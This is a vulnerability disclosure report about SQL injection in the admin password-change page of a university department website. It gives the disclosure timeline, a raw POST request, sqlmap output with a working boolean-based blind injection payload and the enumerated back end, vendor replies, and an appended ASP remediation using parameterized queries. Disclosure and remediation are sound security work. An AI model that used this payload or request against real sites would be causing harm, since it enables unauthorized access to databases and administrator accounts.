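2015-12-04: Details reported to the vendor; awaiting vendor handling.
2015-12-09: Vendor confirmed; details disclosed to the vendor only.
2015-12-09: Vendor fixed the vulnerability and proactively disclosed it; details released to the public.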
As the title says, there is injection in multiple places.
http://mech.upc.edu.cn/
POST /Admin_vertifypass.asp HTTP/1.1
Content-Length: 111
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://mech.upc.edu.cn
Cookie: ASPSESSIONIDSQTTATCC=NJIFBKDCBJHMGFBGKOBMIAHG
Host: mech.upc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

%b5%c7%c2%bc=&name=-1&newpws=1&pws=1&renewpws=1
The name parameter is injectable.
sqlmap identified the following injection point(s) with a total of 352 HTTP(s) requests:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: %b5%c7%c2%bc=&name=-2152' OR 7998=7998 AND 'hsJB'='hsJB&newpws=1&pws=1&renewpws=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: %b5%c7%c2%bc=&name=-2152' OR 7998=7998 AND 'hsJB'='hsJB&newpws=1&pws=1&renewpws=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[1 table]
+-------+
| admin |
+-------+
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-12-09 08:00
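Thank you for your attention to the network information of the University of Petroleum; we will handle this issue as soon as possible.
2015-12-09: The website has been shut down. Thank you for your concern for the network information of China University of Petroleum.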
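
The name field reported above reaches a Microsoft Access query from a classic ASP page, so the remediation is to bind every form field as an ADO parameter instead of building the SQL string from it. The following is an added example, not the site's code and not part of the original report; the username and pws column names, the 50-character limit and the database path are assumptions.

```asp
<%
Option Explicit
' Added example. Only the admin table, the form field names and the Access
' back end come from the report; column names, length limit and the .mdb
' path are assumptions. Password hashing is outside this example's scope.
Const adCmdText = 1, adVarWChar = 202, adParamInput = 1
Const adExecuteNoRecords = 128, MAX_LEN = 50

' True when a form value is present and fits the declared parameter size.
Function ValidField(s)
    ValidField = (Len(s) > 0 And Len(s) <= MAX_LEN)
End Function

Dim name, pws, newpws, renewpws
name     = Request.Form("name")
pws      = Request.Form("pws")
newpws   = Request.Form("newpws")
renewpws = Request.Form("renewpws")

' Reject malformed input before touching the database.
If Not (ValidField(name) And ValidField(pws) And ValidField(newpws)) _
   Or newpws <> renewpws Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Dim conn, cmd, affected
Set conn = Server.CreateObject("ADODB.Connection")
' Placeholder path: keep the .mdb file outside the web root.
conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\data\PLACEHOLDER.mdb"

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
' Positional ? markers: values are sent as data, never spliced into the SQL,
' so a quote or OR clause in "name" can no longer change the WHERE condition.
cmd.CommandText = "UPDATE admin SET pws = ? WHERE username = ? AND pws = ?"
cmd.Parameters.Append cmd.CreateParameter("newpws", adVarWChar, adParamInput, MAX_LEN, newpws)
cmd.Parameters.Append cmd.CreateParameter("name", adVarWChar, adParamInput, MAX_LEN, name)
cmd.Parameters.Append cmd.CreateParameter("pws", adVarWChar, adParamInput, MAX_LEN, pws)
cmd.Execute affected, , adExecuteNoRecords

' Same response for unknown name and wrong password: no boolean oracle.
If affected = 1 Then
    Response.Write "Password changed"
Else
    Response.Write "Invalid name or password"
End If
conn.Close
%>
```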